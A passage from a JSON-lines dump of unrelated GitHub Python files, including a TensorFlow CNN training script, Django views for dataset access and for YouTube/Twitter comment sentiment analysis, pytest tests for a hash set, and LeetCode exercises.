gen_f*Wf*(amp*x-amp*Ws+epsilon_e)\n #noise_red = tf.divide(1.0,tf.add(1.0,tf.exp(-powf)))\n x_image = tf.reshape(noise_red, [-1,width,height,1])\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=x_image\n else:\n input_layer_dic['output_label']='x'\n input_layer_dic['x']=x\n\n layers.insert(0,input_layer_dic)\n\n for i in range(1,len(layers)):\n print(\"Creating layer:\",layers[i]['name'])\n create_conv(iDic=layers[i],input_layer=layers[i-1][layers[i-1]['output_label']],iName=layers[i]['name'],prev_dic=layers[i-1])\n\n FCL_input=layers[-1][layers[-1]['output_label']]\n FCL_input_features = get_previous_features(FCL_input)\n W_FCL = tf.Variable(tf.truncated_normal([FCL_input_features, class_output], stddev=stddev_n))\n b_FCL = tf.Variable(tf.constant(stddev_n, shape=[class_output])) \n FCL=tf.matmul(FCL_input, W_FCL) + b_FCL\n 
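# [editor's aside, a sketch only] The softmax + manual log loss defined just below
# can underflow to log(0) = -inf/nan, which is consistent with the "nan" guards
# later in this file; a numerically safer TF1 formulation works from the logits:
import tensorflow as tf

logits = tf.constant([[10.0, -10.0]])
labels = tf.constant([[1.0, 0.0]])
stable = tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels, logits=logits)
with tf.Session() as s:
    print(s.run(stable))  # ~[2e-09], no intermediate log(softmax) to underflow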
y_CNN = tf.nn.softmax(FCL)\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_CNN), reduction_indices=[1]))\n\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n yi = tf.argmax(y_,1)\n yp = tf.argmax(y_CNN,1)\n\n tpi = yp*yi\n tp = tf.reduce_sum(tf.cast(tf.greater(tpi,0),tf.int32))\n \n fni = yi-yp\n fn = tf.reduce_sum(tf.cast(tf.greater(fni,0),tf.int32))\n \n sensitivity = tp/(fn+tp)\n \n tni = yi+yp\n tn = tf.reduce_sum(tf.cast(tf.equal(tni,0),tf.int32))\n \n fpi = yp - yi\n fp = tf.reduce_sum(tf.cast(tf.greater(fpi,0),tf.int32))\n \n specificity = tn/(tn+fp)\n accuracy = (tn+tp)/(tn+tp+fn+fp)\n correct_prediction = tf.equal(tf.argmax(y_CNN,1), tf.argmax(y_,1))\n \n acc_no_mean = tf.cast(correct_prediction, tf.float32)\n\n #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n init_op = tf.global_variables_initializer()\n \n \n ###########\n with tf.Session() as s:\n print(\"Starting session\")\n test_keep_prob = 1.0\n s.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n if restore_session==True:\n #tf.reset_default_graph()\n saver.restore(s,tf.train.latest_checkpoint('./'))\n dic_to_feed = {x:_x_batch,y_:_y_batch}\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=test_keep_prob\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(_x_batch,bins=_layer['x2_features'])\n for _ in range(1,len(layers)):\n _layer = layers[_]\n _name = _layer['name']\n _label = _layer['output_label']\n _data_show = _layer[_label]\n\n r=s.run(_data_show,feed_dict=dic_to_feed)\n print(_name,_label,r.shape)\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"First batch evaluation using the training set, batch 0 \",\"Loss:\",cross,\"Accuracy:\",acc)\n\n return_dic = {'training_message':None}\n if only_feed_forward == False:\n train_total_acc = []\n train_total_cross = []\n dic_to_feed = {x:_x_batch,y_:_y_batch}#,_layer['keep_prob']:1}\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=_layer['keep_prob_train']\n #dic_to_feed[_layer['keep_prob']]=1.0\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(_x_batch,bins=_layer['x2_features'])\n for itern in range(0,iters):\n if batch_proc == False:\n #dic_to_feed = {x:_x_batch,y_:_y_batch,_layer['keep_prob']:_layer['keep_prob_train']}\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"iter:\",itern,\"Loss:\",cross,\"Accuracy:\",acc)\n else:\n train_batch_acc = []\n train_batch_cross = []\n for bn,batch_n in enumerate(train_batch):\n x_batch,y_batch=batch_n[0],batch_n[1]\n dic_to_feed[x]=x_batch\n dic_to_feed[y_]=y_batch\n for _layer in layers:\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(x_batch,bins=_layer['x2_features'])\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"iter:\",itern,\"batch:\",bn,\"Loss:\",cross,\"Accuracy:\",acc)\n train_batch_acc.append(acc)\n train_batch_cross.append(cross)\n train_total_acc.append(acc)\n train_total_cross.append(cross)\n #if cross<min_train_loss:\n if str(cross) == \"nan\":\n break;\n if str(cross) != \"nan\":\n np_train_batch_acc = np.asarray(train_batch_acc)\n print(\"Train batch 
mean\",np_train_batch_acc.mean(),\"min:\",np_train_batch_acc.min(),\"max\",np_train_batch_acc.max())\n #if cross<min_train_loss:\n if str(cross) == \"nan\":\n print(\"Stopped by learning convergence. Loss=nan\")\n return_dic['training_message']=\"min_train_loss\"\n break;\n if str(cross) != \"nan\":\n np_train_acc = np.asarray(train_total_acc[len(train_batch)*(iters-1):])\n print(\"Train last iter mean\",np_train_acc.mean(),\"min:\",np_train_acc.min(),\"max\",np_train_acc.max())\n if save_model ==True:\n print(\"Saving model in:\",model_file)\n saving_model = saver.save(s, model_file)\n return_dic['train_acc']=train_total_acc.copy()\n return_dic['train_cross']=train_total_cross.copy()\n else:\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=test_keep_prob\n if batch_proc == False:\n cross,acc=s.run([cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"Loss:\",cross,\"Accuracy:\",acc)\n else:\n if test_batch_bool == True:\n feed_batch = test_batch\n print(\"Evaluating using test batch\")\n else:\n feed_batch = train_batch\n print(\"Evaluating using train batch\")\n total_accuracy = []\n total_loss = []\n global_acc = []\n pred_list = []\n tf_pn = []\n for bn,batch_n in enumerate(feed_batch):\n x_batch,y_batch=batch_n[0],batch_n[1]\n dic_to_feed[x]=x_batch\n dic_to_feed[y_]=y_batch\n for _layer in layers:\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(x_batch,bins=_layer['x2_features'])\n cross,acc,gacc,y_pred,tpo,tno,fpo,fno=s.run([cross_entropy,accuracy,acc_no_mean,y_CNN,tp,tn,fp,fn],feed_dict=dic_to_feed)\n #get_deconv=True\n #deconv_layer='CV2'\n #deconv_val = 'conv'\n if get_deconv==True:\n for _layer in layers:\n if 'name' in _layer.keys():\n if deconv_layer == _layer['name']:\n return_dic['deconv']=s.run(_layer[deconv_val],feed_dict=dic_to_feed)\n total_accuracy.append(acc)\n total_loss.append(cross)\n global_acc.append(gacc)\n pred_list.append(y_pred)\n tf_pn.append([tpo,tno,fpo,fno])\n print(\"batch:\",bn,\"Loss:\",cross,\"Accuracy:\",acc)\n np_acc = np.asarray(total_accuracy)\n tf_pn_np = np.asarray(tf_pn)\n tpo,tno,fpo,fno = np.sum(tf_pn_np,0).tolist()\n print(\"tp\",tpo,\"tn\",tno,\"fp\",fpo,\"fn\",fno)\n o_sensitivity = tpo/(fno+tpo+0.00001)\n o_specificity = tno/(tno+fpo+0.00001)\n print(\"Test Accuracy mean:\",np_acc.mean(),\"min:\",np_acc.min(),\"max:\",np_acc.max(),\"Sensitivity:\",o_sensitivity,\"Specificity:\",o_specificity)\n return_dic['test_acc']=total_accuracy.copy()\n return_dic['test_g_acc']=global_acc.copy()\n return_dic['y_pred']=pred_list.copy()\n return_dic['test_cross']=total_loss.copy()\n return_dic['stats']={'tp':tpo,'tn':tno,'fp':fpo,'fn':fno,'sensitivity':o_sensitivity,'specificity':o_specificity}\n print(\"Done\")\n return return_dic.copy()\n## Some utils:\ndef send_mail(email_origin,email_destination,email_pass,subject=\"Test report\",content=\"Test\"):\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n #Next, log in to the server\n server.login(email_origin,email_pass)\n msg = \"Subject:\"+subject+\" \\n\\n \"+content+\"\\n\" # The /n separates the message from the headers\n server.sendmail(email_origin,email_destination, msg)\ndef hist_batch(iNp,bins=256):\n rows = iNp.shape[0]\n for _ in range(0,rows):\n if _ == 0:\n hist_np = np.histogram(iNp[_,:],bins=bins)[0]\n hist_np = np.reshape(hist_np,(1,hist_np.shape[0]))\n else:\n hist_np_t = np.histogram(iNp[_,:],bins=bins)[0]\n hist_np_t = 
np.reshape(hist_np_t,(1,hist_np_t.shape[0]))\n hist_np = np.concatenate((hist_np,hist_np_t),0)\n return hist_np.copy()\ndef border_filter_pad_batch(iNp):\n rows = iNp.shape[0]\n cols = iNp.shape[1]\n sq_shape = int(np.sqrt(cols))\n for _ in range(0,rows):\n imgx_r = np.reshape(iNp[_,:],(sq_shape,sq_shape))\n if _ == 0:\n output = np.reshape(borderFilterPad(imgx_r),(1,cols))\n else:\n output_t = np.reshape(borderFilterPad(imgx_r),(1,cols))\n output = np.concatenate((output,output_t),0)\n return output.copy()\ndef borderFilterPad(np_img):\n np_imgx=np_img.copy().astype('float')\n npimgs=np_imgx.shape\n imgx=npimgs[0]\n imgy=npimgs[1]\n dx_img=np.zeros((imgx,imgy))\n for y in range(1,imgy-1):\n for x in range(1,imgx-1):\n dx_img[x,y]=np.abs(np_imgx[x+1,y]-np_imgx[x-1,y]) + np.abs(np_imgx[x,y+1]-np_imgx[x,y-1]) + np.abs(np_imgx[x+1,y+1]-np_imgx[x-1,y-1]) + np.abs(np_imgx[x-1,y+1]-np_imgx[x+1,y+1])\n total_diff = ( dx_img*255 )/( dx_img.max() - dx_img.min() )\n return total_diff.copy()","repo_name":"bsaldivaremc2/ConvolutionalNeuralNetwork-quick","sub_path":"cnn_modeling.py","file_name":"cnn_modeling.py","file_ext":"py","file_size_in_byte":29937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16656298463","text":"from geofluxus.apps.utils.views import (UnlimitedResultsSetPagination)\nfrom geofluxus.apps.utils.views import (PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet)\nfrom geofluxus.apps.asmfa.models import (DatasetType,\n Dataset)\nfrom geofluxus.apps.login.models import (GroupDataset)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeSerializer,\n DatasetSerializer)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeListSerializer,\n DatasetListSerializer)\nfrom geofluxus.apps.asmfa.serializers import (DatasetTypeCreateSerializer,\n DatasetCreateSerializer)\nfrom rest_framework.response import Response\nfrom collections import OrderedDict\n\n\n# DatasetType\nclass DatasetTypeViewSet(PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet):\n queryset = DatasetType.objects.order_by('id')\n pagination_class = UnlimitedResultsSetPagination\n serializer_class = DatasetTypeSerializer\n serializers = {\n 'list': DatasetTypeListSerializer,\n 'create': DatasetTypeCreateSerializer\n }\n\n\n# Dataset\nclass DatasetViewSet(PostGetViewMixin,\n ViewSetMixin,\n ModelPermissionViewSet):\n queryset = Dataset.objects.order_by('id')\n pagination_class = UnlimitedResultsSetPagination\n serializer_class = DatasetSerializer\n serializers = {\n 'list': DatasetListSerializer,\n 'create': DatasetCreateSerializer\n }\n\n def list(self, request, **kwargs):\n from django.http import HttpResponse\n if request.query_params.get('request', None) == 'template':\n serializer = self.serializers.get('create', None)\n if serializer and hasattr(serializer, 'create_template'):\n content = serializer.create_template()\n response = HttpResponse(\n content_type=(\n 'application/vnd.openxmlformats-officedocument.'\n 'spreadsheetml.sheet'\n )\n )\n model = self.serializer_class.Meta.model\n filename = model._meta.object_name.lower()\n response['Content-Disposition'] = \\\n 'attachment; filename={}.xlsx'.format(filename)\n response.write(content)\n return response\n\n # retrieve datasets for user\n user = request.user\n groups = user.groups.values_list('id', flat=True)\n ids = GroupDataset.objects.filter(group__id__in=groups) \\\n .values_list('dataset__id', flat=True) \\\n .distinct()\n\n # filter and serialize\n if not user.is_superuser:\n 
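# non-superusers only see datasets granted to one of their groups\n            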
self.queryset = self.queryset.filter(id__in=ids)\n        serializer = DatasetSerializer(self.queryset,\n                                       many=True,\n                                       context={'request': request})\n        return Response(OrderedDict([\n            ('count', self.queryset.count()),\n            ('results', serializer.data)\n        ]))","repo_name":"VasileiosBouzas/geoflux","sub_path":"geofluxus/apps/asmfa/views/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22865980478","text":"class Solution:\n    def rotate(self, matrix: List[List[int]]) -> None:\n        \"\"\"\n        Do not return anything, modify matrix in-place instead.\n        \"\"\"\n        n = len(matrix[0])\n\n        counter = 0\n        stack = []\n        \n        #n-i-1\n        for i in range(n):\n            stack.extend(matrix[i])\n            matrix[i] = []\n        \n        print (\"stack: \", stack)\n        for x in range(n):\n            for i in range(1,n+1):\n                matrix[n-i].append(stack.pop())\n        \n        print (\"Matrix: \", matrix)\n        \n        \n","repo_name":"n-chapkey/LeetCodePractice","sub_path":"0048-rotate-image/0048-rotate-image.py","file_name":"0048-rotate-image.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71315467368","text":"import re\n\nimport tweepy\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model, login\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom percentage import percentage\nfrom textblob import TextBlob\n# from langdetect import detect\nimport emoji\nfrom emot.emo_unicode import UNICODE_EMOJI\nfrom googleapiclient.discovery import build\nfrom googletrans import Translator\n# import indicnlp.transliterate.unicode_transliterate\n# from indicnlp.transliterate.unicode_transliterate.ItransTransliterator import ItransTransliterator\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom django.conf import settings\n\n# Create your views here.\nfrom sentiment.forms import InputTextForm, BasicRegForm, LoginForm\n\n\nclass EmailBackend(ModelBackend):\n    def authenticate(self, username=None, password=None, **kwargs):\n        UserModel = get_user_model()\n        try:\n            user = UserModel.objects.get(email=username)\n        except UserModel.DoesNotExist:\n            return None\n        else:\n            if user.check_password(password):\n                return user\n        return None\n\n\ndef login_function(request):\n    login_form = LoginForm()\n    if request.method == \"POST\":\n        login_form = LoginForm(request.POST)\n        if login_form.is_valid():\n            username = login_form.cleaned_data.get('email')\n            password = login_form.cleaned_data.get('password')\n            # instantiate the backend; the previous call passed request in place of self\n            user = EmailBackend().authenticate(username=username, password=password)\n            if user is not None:\n                if user.is_active:\n                    login(request, user)\n                    return HttpResponseRedirect(reverse('dashboard'))\n            else:\n                messages.warning(request, 'Required user was not verified')\n    context = {\n        \"login_form\": login_form\n    }\n    return render(request, 'signin.html', context)\n\n\ndef sign_up(request):\n    register_form = BasicRegForm()\n    if request.method == \"POST\":\n        register_form = BasicRegForm(request.POST)\n        if register_form.is_valid():\n            tec = register_form.save(commit=False)\n            password = tec.password\n            tec.set_password(password)\n            tec.save()\n            messages.info(request, 'User registered successfully')\n            return HttpResponseRedirect(reverse('dashboard'))\n    context = {\n        
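# context handed to the signup template\n        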
\"register_form\": register_form\n }\n return render(request, 'signup.html', context)\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'dashboard.html')\n\n\n@login_required\ndef youtube_result(request):\n input_form = InputTextForm()\n if request.method == \"POST\":\n input_form = InputTextForm(request.POST)\n overall_analysis = {}\n language_group = {}\n emoji_list = []\n comment_list = []\n translated_emoji = []\n if input_form.is_valid():\n # TODO: Get youtube details\n print(input_form.cleaned_data.get('input_url'))\n youtube_video_id = fetch_youtube_video_id(input_form.cleaned_data.get('input_url'))\n # print(input_form.cleaned_data('input_url'))\n if youtube_video_id:\n comment_list = fetch_comments_youtube(youtube_video_id)\n # comment_list = [\"میں معافی چاہتا ہوں\", \"میں ٹھیک ہوں\", \"I am fine\", \"Video achi hai\", \"My name is khan 😂\", \"☮ 🙂 ❤\"]\n # if len(comment_list) > settings.COMMENTS_SIZE:\n\n for comment in comment_list:\n clean_emoji = extract_emojis(comment)\n if clean_emoji:\n emoji_list.append(clean_emoji)\n # Remove emojis from text\n remove_emoji_from_text = [comment for comment in comment_list if comment not in emoji_list]\n language_group = language_cluster(remove_emoji_from_text)\n for emojis in emoji_list:\n translated_emoji.append(convert_emojis(emojis).replace(\"_\", \" \"))\n overall_analysis = overall_sentiment_analysis(translated_emoji, language_group, len(comment_list))\n context = {\n 'input_form': input_form,\n 'result': True,\n 'overall_comments': comment_list,\n 'overall_analysis': overall_analysis,\n 'overall_language_name': [\"Emoji\", \"urdu\", \"English\", \"Roman Urdu\"],\n 'overall_language_summary': [len(emoji_list), len(language_group['urdu_cluster']),\n len(language_group['english_cluster']), len(language_group['roman_cluster'])],\n 'english_comment': language_group['english_cluster'],\n 'english_analysis': sentiment_analysis(language_group['english_cluster']),\n 'urdu_comment': language_group['urdu_cluster'],\n 'urdu_analysis': sentiment_analysis(urdu_conversion(language_group['urdu_cluster'])),\n 'emoji_comment': emoji_list,\n 'emoji_analysis': sentiment_analysis(translated_emoji),\n }\n print(context)\n return render(request, 'youtube-result.html', context)\n context = {\n 'input_form': input_form,\n \"result\": False\n }\n return render(request, 'youtube-result.html', context)\n\n\n@login_required()\ndef twitter_result(request):\n input_form = InputTextForm()\n if request.method == \"POST\":\n input_form = InputTextForm(request.POST)\n overall_analysis = {}\n language_group = {}\n emoji_list = []\n comment_list = []\n translated_emoji = []\n if input_form.is_valid():\n # TODO: Get twitter details\n print(input_form.cleaned_data.get('input_url'))\n twitter_name_id = fetch_twitter_name_id(input_form.cleaned_data.get('input_url'))\n # print(input_form.cleaned_data('input_url'))\n if twitter_name_id:\n comment_list = fetch_replies_twitter(twitter_name_id['name'],twitter_name_id['tweet'])\n # comment_list = [\"میں معافی چاہتا ہوں\", \"میں ٹھیک ہوں\", \"I am fine\", \"Video achi hai\", \"My name is khan 😂\", \"☮ 🙂 ❤\"]\n # if len(comment_list) > settings.COMMENTS_SIZE:\n\n for comment in comment_list:\n clean_emoji = extract_emojis(comment)\n if clean_emoji:\n emoji_list.append(clean_emoji)\n # Remove emojis from text\n remove_emoji_from_text = [comment for comment in comment_list if comment not in emoji_list]\n language_group = 
language_cluster(remove_emoji_from_text)\n            for emojis in emoji_list:\n                translated_emoji.append(convert_emojis(emojis).replace(\"_\", \" \"))\n            overall_analysis = overall_sentiment_analysis(translated_emoji, language_group, len(comment_list))\n            context = {\n                'input_form': input_form,\n                'result': True,\n                'overall_comments': comment_list,\n                'overall_analysis': overall_analysis,\n                'overall_language_name': [\"Emoji\", \"urdu\", \"English\", \"Roman Urdu\"],\n                'overall_language_summary': [len(emoji_list), len(language_group['urdu_cluster']),\n                                             len(language_group['english_cluster']), len(language_group['roman_cluster'])],\n                'english_comment': language_group['english_cluster'],\n                'english_analysis': sentiment_analysis(language_group['english_cluster']),\n                'urdu_comment': language_group['urdu_cluster'],\n                'urdu_analysis': sentiment_analysis(urdu_conversion(language_group['urdu_cluster'])),\n                'emoji_comment': emoji_list,\n                'emoji_analysis': sentiment_analysis(translated_emoji),\n            }\n            print(context)\n            return render(request, 'twitter-result.html', context)\n    context = {\n        'input_form': input_form,\n        \"result\": False\n    }\n    return render(request, 'twitter-result.html', context)\n\ndef fetch_twitter_name_id(twitter_url: str) -> dict:\n    # the \"tweet\" key must match the twitter_name_id['tweet'] lookup in twitter_result\n    return {\n        \"name\": twitter_url.split(\".com/\")[1].split(\"/status\")[0],\n        \"tweet\": twitter_url.split(\"status/\")[1].split(\"?\")[0]\n    }\n\n\ndef fetch_youtube_video_id(youtube_url: str) -> str:\n    return youtube_url.split(\"watch?v=\")[1].split(\"&ab_channel\")[0]\n\n\ndef clean_tweets(tweet):\n    tweet = re.sub(\"@[A-Za-z0-9_]+\", \"\", tweet)\n    tweet = re.sub(\"#[A-Za-z0-9_]+\", \"\", tweet)\n    tweet = re.sub(r'http\\S+', '', tweet)\n    tweet = re.sub(r'www\\.\\S+', '', tweet)\n    # remove numbers\n    tweet = re.sub(r'\\w*\\d+\\w*', '', tweet)\n    # collapse runs of whitespace into a single space\n    tweet = re.sub(r'\\s{2,}', \" \", tweet)\n\n    tweet = tweet.split()\n    temp = \" \".join(word for word in tweet)\n    return temp\n\n\ndef fetch_replies_twitter(twitter_name: str, twitter_tweet: str) -> list:\n    auth = tweepy.OAuthHandler(settings.TWITTER_CONSUMER_KEY, settings.TWITTER_CONSUMER_SECRET)\n    auth.set_access_token(settings.TWITTER_ACCESS_TOKEN, settings.TWITTER_ACCESS_TOKEN_SECRET)\n    api = tweepy.API(auth)\n    replies = []\n    # q=\"@username\", since_id=tweet_id\n    for tweet in tweepy.Cursor(api.search_tweets, q='{}'.format(twitter_name), since_id=twitter_tweet,\n                               result_type='recent').items():\n        replies.append(tweet.text)\n    return [clean_tweets(tw) for tw in replies]\n\n\ndef fetch_comments_youtube(youtube_video_id: str) -> list:\n    video_comments = []\n    youtube = build('youtube', 'v3', developerKey=settings.YOUTUBE_API_KEY)\n    video_response = youtube.commentThreads().list(\n        part='snippet,replies',\n        videoId=youtube_video_id\n    ).execute()\n\n    for item in video_response['items']:\n        comment = item['snippet']['topLevelComment']['snippet']['textDisplay']\n        comment = re.sub('[^a-zA-Z0-9 \n\.]', '', comment)\n        video_comments.append(comment)\n    return video_comments\n\n\ndef extract_emojis(text: str) -> str:\n    characters: list\n    emoji_list: list\n    # # clean_text: str\n    # remove all tagging and links, not needed for sentiment\n    # remove_keys = (\"@\", \"https://\", \"&\", \"#\")\n    # # TODO: It's not necessary\n    # clean_text = \" \".join(txt for txt in text if not txt.startswith(remove_keys))\n\n    # setup the input, get the characters and the emoji lists\n    characters = [chr for chr in text]\n    emoji_list = [c for c in characters if c in emoji.UNICODE_EMOJI[\"en\"]]\n    clean_emoji = \" \".join([chr for chr in text if any(i in chr for i in emoji_list)])\n    return clean_emoji\n\n\ndef convert_emojis(text: str) -> str:\n    for emojis in UNICODE_EMOJI:\n        text = text.replace(emojis, \"_\".join(UNICODE_EMOJI[emojis].replace(\",\", \"\").replace(\":\", \"\").split()))\n    return text\n\n\ndef language_cluster(sentences: list) -> dict:\n    translator = Translator()\n    totranslate = translator.translate(sentences)\n    english_cluster, urdu_cluster, roman_cluster = [], [], []\n    for detection in totranslate:\n        emoji_pattern = re.compile(\"[\"\n                                   u\"\\U0001F600-\\U0001F64F\"  # emoticons\n                                   u\"\\U0001F300-\\U0001F5FF\"  # symbols & pictographs\n                                   u\"\\U0001F680-\\U0001F6FF\"  # transport & map symbols\n                                   u\"\\U0001F1E0-\\U0001F1FF\"  # flags (iOS)\n                                   u\"\\U00002702-\\U000027B0\"\n                                   u\"\\U000024C2-\\U0001F251\"\n                                   \"]+\", flags=re.UNICODE)\n        detection.origin = emoji_pattern.sub(r'', detection.origin)\n        if detection.src == 'ur':\n            urdu_cluster.append(detection.origin)\n        elif detection.src == 'en':\n            english_cluster.append(detection.origin)\n        else:\n            roman_cluster.append(detection.origin)\n    return {\n        \"urdu_cluster\": urdu_cluster,\n        \"english_cluster\": english_cluster,\n        \"roman_cluster\": roman_cluster\n    }\n\n\ndef urdu_conversion(sentence: list):\n    translator = Translator()\n    converted = translator.translate(sentence)\n    text = []\n    for translation in converted:\n        text.append(translation.text)\n    return text\n\n\ndef sentiment_analysis(sentences: list) -> dict:\n    print(len(sentences))\n    if sentences:\n        negative_sentiment, positive_sentiment, neutral_sentiment = 0, 0, 0\n        for sentence in sentences:\n            score = SentimentIntensityAnalyzer().polarity_scores(sentence)\n            negative_sentiment += score['neg']\n            neutral_sentiment += score['neu']\n            positive_sentiment += score['pos']\n        return {\n            \"negative_sentiment\": (negative_sentiment / len(sentences)) * 100,\n            \"neutral_sentiment\": (neutral_sentiment / len(sentences)) * 100,\n            \"positive_sentiment\": (positive_sentiment / len(sentences)) * 100\n        }\n    # avoid returning None (the annotation promises a dict) for empty clusters\n    return {\n        \"negative_sentiment\": 0,\n        \"neutral_sentiment\": 0,\n        \"positive_sentiment\": 0\n    }\n\n\ndef overall_sentiment_analysis(emoji_analysis: list, languages_clusters: dict, all_comments_len: int) -> dict:\n    negative_sentiment, positive_sentiment, neutral_sentiment = 0, 0, 0\n    for sentence in emoji_analysis:\n        score = SentimentIntensityAnalyzer().polarity_scores(sentence)\n        negative_sentiment += score['neg']\n        neutral_sentiment += score['neu']\n        positive_sentiment += score['pos']\n\n    for urdu_cluster in urdu_conversion(languages_clusters[\"urdu_cluster\"]):\n        score = SentimentIntensityAnalyzer().polarity_scores(urdu_cluster)\n        negative_sentiment += score['neg']\n        neutral_sentiment += score['neu']\n        positive_sentiment += score['pos']\n\n    for english_sentence in languages_clusters[\"english_cluster\"]:\n        score = SentimentIntensityAnalyzer().polarity_scores(english_sentence)\n        negative_sentiment += score['neg']\n        neutral_sentiment += score['neu']\n        positive_sentiment += score['pos']\n\n    return {\n        \"negative_sentiment\": (negative_sentiment / all_comments_len) * 100,\n        \"neutral_sentiment\": (neutral_sentiment / all_comments_len) * 100,\n        \"positive_sentiment\": (positive_sentiment / all_comments_len) * 100\n    }\n","repo_name":"Amrat-UN-Nisa/Business_sentiment_analysis_using_twitter_and_youtube_comments","sub_path":"sentiment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2676201622","text":"import pytest\n\nfrom tests.conftest import import_stuff\n\nimport_stuff('hashset')\n\n# yuck!\nfrom 
tests.conftest import *\n\n\n@pytest.mark.key("e4q1")\nclass TestHashSet:\n\n    def test_hashset_struct(self):\n        try:\n            HashSet()\n        except NotImplementedError as e:\n            assert False, e\n        except TypeError:\n            assert True\n\n    def test_hashset_new(self, char_list):\n        hs = hs_new(char_list)\n        assert isinstance(hs, HashSet)\n\n    def test_hashset_is_empty(self, char_list):\n        hs = hs_new(char_list)\n        if len(char_list) == 0:\n            assert hs_is_empty(hs) is True\n        else:\n            assert hs_is_empty(hs) is False\n\n    def test_hashset_size(self, char_list):\n        hs = hs_new(char_list)\n        assert hs_size(hs) == len(char_list)\n\n    def test_hashset_member(self, char_list):\n        hs = hs_new(char_list)\n        for letter in char_list:\n            assert hs_member(hs, letter) is True\n        assert hs_member(hs, 'Z') is False\n\n    def test_hashset_iterate(self, char_list):\n        hs = hs_new(char_list)\n        for letter in hs_iterate(hs):\n            assert letter in char_list\n\n    def test_hashset_insert(self, char_list):\n        hs = hs_new()\n        for letter in char_list:\n            hs_insert(hs, letter)\n        for letter in char_list:\n            assert hs_member(hs, letter) is True\n\n    def test_hashset_delete(self, char_list):\n        hs = hs_new(char_list)\n        for letter in char_list:\n            hs_delete(hs, letter)\n        assert hs_size(hs) == 0\n\n    def test_hashset_union(self, char_list, char_list2):\n        hs = hs_new(char_list)\n        hs2 = hs_new(char_list2)\n        hsboth = hs_union(hs, hs2)\n        for letter in char_list:\n            assert hs_member(hsboth, letter) is True\n        for letter in char_list2:\n            assert hs_member(hsboth, letter) is True\n\n    def test_hashset_intersection(self, char_list, char_list2):\n        hs = hs_new(char_list)\n        hs2 = hs_new(char_list2)\n        hsboth = hs_intersection(hs, hs2)\n        for letter in char_list:\n            if letter in char_list2:\n                assert hs_member(hsboth, letter) is True\n            else:\n                assert hs_member(hsboth, letter) is False\n\n    def test_hashset_difference(self, char_list, char_list2):\n        hs = hs_new(char_list)\n        hs2 = hs_new(char_list2)\n        hsboth = hs_difference(hs, hs2)\n        for letter in char_list:\n            if letter in char_list2:\n                assert hs_member(hsboth, letter) is False\n            else:\n                assert hs_member(hsboth, letter) is True","repo_name":"titouan-gautier/Polytech","sub_path":"INFO3A - S5/Algo & Prog/TP/tests/tp6/test_hashset_dataclass.py","file_name":"test_hashset_dataclass.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070889127","text":"# Every valid email address consists of a local name and a domain name, separated by the '@' sign. Besides lowercase letters, the address may also contain one or more '.' or '+'.\n# \n#  For example, in alice@leetcode.com, alice is the local name and leetcode.com is the domain name. \n# \n# If periods ('.') are added between some characters of the local name, mail sent there is forwarded to the same address without the dots in the local name. Note that this rule does not apply to domain names.\n# \n#  For example, \"alice.z@leetcode.com\" and \"alicez@leetcode.com\" forward to the same email address. \n# \n# If a plus sign ('+') is added in the local name, everything after the first plus sign is ignored. This allows certain emails to be filtered. Again, this rule does not apply to domain names. \n# \n#  For example, m.y+name@email.com will be forwarded to my@email.com. \n# \n# Both rules can be used at the same time. \n# \n# Given a string array emails where we send one email to each emails[i], return the number of distinct addresses that actually receive mail. \n# \n# Example 1: \n# \n# Input: emails = [\"test.email+alex@leetcode.com\",\"test.e.mail+bob.cathy@leetcode.com\",\"testemail+david@lee.tcode.com\"]\n# Output: 2\n# Explanation: The mail is actually received by \"testemail@leetcode.com\" and \"testemail@lee.tcode.com\".\n# \n# Example 2: \n# 